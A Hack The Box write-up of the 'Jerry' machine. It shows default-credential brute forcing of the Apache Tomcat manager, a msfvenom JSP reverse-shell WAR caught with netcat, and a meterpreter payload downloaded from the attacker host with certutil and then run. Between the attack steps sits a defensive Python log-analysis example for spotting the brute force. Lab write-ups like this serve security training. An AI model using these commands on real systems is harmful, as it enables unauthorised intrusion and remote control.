# Jerry HTB

## Enumeration

* We use nmap for enumeration:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-48ed32ef71dd7f98410bafa7bdcc35c3df0a1a08%2F8cddd3f669aa81aea34d8653a30213a4.png?alt=media)
* We find a default web page (Apache Tomcat):![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-5ed5032249848577ca2cac2476aae941f1b1101b%2Fd02f2dc3192004cfd7585a724d0f1ef8.png?alt=media)

## Exploitation

* Using Burp Suite we find that the credentials sent to the Tomcat manager are base64 encoded (HTTP Basic auth):![](2024-01-30_17-04.png)
* We can use Burp's Decoder to decode the base64 and find that it is in `username:password` format:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ecfa97f6f66ce267050410eedb89a8bfb94912c4%2Fa5f1a7ba31b459cc5db0cb05c841e182.png?alt=media)
* To brute force, each candidate `username:password` pair has to be converted to base64 the same way:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-f6ea122409cb1a2ffc7d51f50a3e03b0ff4aa89d%2F4f60e926b816554f43443b0369c09eac.png?alt=media)
* To do this for the whole list we use a bash loop (reading line by line so that entries containing spaces stay intact): `while IFS= read -r cred; do printf '%s' "$cred" | base64; done < tomcat_passwds.txt`, where `tomcat_passwds.txt` holds the default Tomcat credentials.
* Use Burp Suite to brute force: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8f03b5d12c6449fa78c48ab5960d52a17acae1ca%2Fe77a9f5d4675c83e9021b93490f5570e.png?alt=media)![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c7287f40aa7b680d2f26bc9bbd1866f6f742a2c5%2F03e27f6b79e550cb04c3133bfb5c2bbf.png?alt=media)
* We find 2 matches: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-861e286d7090482b09a7c3bc24621c0564e563f7%2F4ead91fe8752623142e84e771e647cb0.png?alt=media)
* These are the valid credentials:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a5739f83c0d9ff932a3f9e6e9acf66506d593484%2Fc869f5d1258d6afb864ce672de57603f.png?alt=media)
* We create a WAR payload with `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f war > reverse.war`, then deploy it through the Tomcat manager using the credentials found above.![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-afd3298e93c29e8094a2c0a73154ebbd8f4bb337%2F8b49fe36849bd475de6c2b24314a1b21.png?alt=media)
* Listening with netcat using `nc -nlvp 4444`, we get a root shell:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3dae2b474ac96891559b7576a469d10436954636%2Fa2375e2e39e1be7e5fbd328004feeb6b.png?alt=media)
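Seen from the defending side, the credential brute force above leaves a recognisable trace in Tomcat's access log: a burst of 401 responses on `/manager/html` from one client, then a 2xx/3xx response with an authenticated user. The following is an added example, not part of this writeup, that flags that pattern; the log lines are constructed, the `tomcat` user name is made up, and the AccessLogValve "common" log pattern is assumed.

```python
import re
from collections import defaultdict

# Matches the AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: five rejected manager logins from one client,
# then an authenticated request and an upload (user "tomcat" is made up).
SAMPLE_LOG = """\
10.10.14.25 - - [30/Jan/2024:17:04:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.25 - - [30/Jan/2024:17:04:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.25 - - [30/Jan/2024:17:04:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.25 - - [30/Jan/2024:17:04:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.25 - - [30/Jan/2024:17:04:03 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.25 - tomcat [30/Jan/2024:17:04:03 +0000] "GET /manager/html HTTP/1.1" 200 19481
10.10.14.25 - tomcat [30/Jan/2024:17:04:20 +0000] "POST /manager/html/upload HTTP/1.1" 302 0
192.168.1.10 - - [30/Jan/2024:17:05:00 +0000] "GET /index.html HTTP/1.1" 200 11156
"""


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_manager_bruteforce(log_text, threshold=5):
    """Return {ip: summary} for clients with at least `threshold` 401 responses
    on /manager/*. The summary also records whether the burst was followed by
    an authenticated manager request from the same client, and as which user."""
    failures = defaultdict(int)
    logged_in_as = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        status = int(rec["status"])
        if status == 401:
            failures[rec["ip"]] += 1
        elif status < 400 and rec["user"] != "-" and failures[rec["ip"]] >= threshold:
            # First authenticated request after the failure burst: the guess succeeded
            logged_in_as.setdefault(rec["ip"], rec["user"])
    return {ip: {"failed": n, "then_logged_in_as": logged_in_as.get(ip)}
            for ip, n in failures.items() if n >= threshold}
```

A hit with `then_logged_in_as` set means the guessing worked and the manager account should be treated as compromised, not just rate-limited.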

### Metasploit

* Use `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe` to create the payload.
* Listen using `exploit/multi/handler`.
* To upload the payload, host an HTTP server with `python -m SimpleHTTPServer 80`, then run `certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe` in the shell and execute the downloaded `meterpreter.exe`.
* Then we get a meterpreter shell.
